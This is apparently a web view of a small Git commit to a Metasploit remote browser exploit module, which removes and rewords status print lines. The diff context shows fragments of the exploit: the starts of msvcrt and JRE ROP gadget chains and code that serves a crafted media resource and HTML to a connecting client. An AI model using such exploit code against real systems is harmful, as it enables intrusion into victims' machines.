Fixing up print statements
Dropping the ROP prints since they're not all that useful.unstable
parent
1396fc19bd
commit
302a42a495
|
@ -87,7 +87,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Both ROP chains generated by mona.py - See corelan.be
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
print_status("Using msvcrt ROP")
|
||||
rop =
|
||||
[
|
||||
0x77c4e392, # POP EAX # RETN
|
||||
|
@ -111,7 +110,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
].pack("V*")
|
||||
|
||||
when :jre
|
||||
print_status("Using JRE ROP")
|
||||
rop =
|
||||
[
|
||||
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
|
||||
|
@ -256,7 +254,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer">
|
|||
end
|
||||
|
||||
add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil
|
||||
print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending html...")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue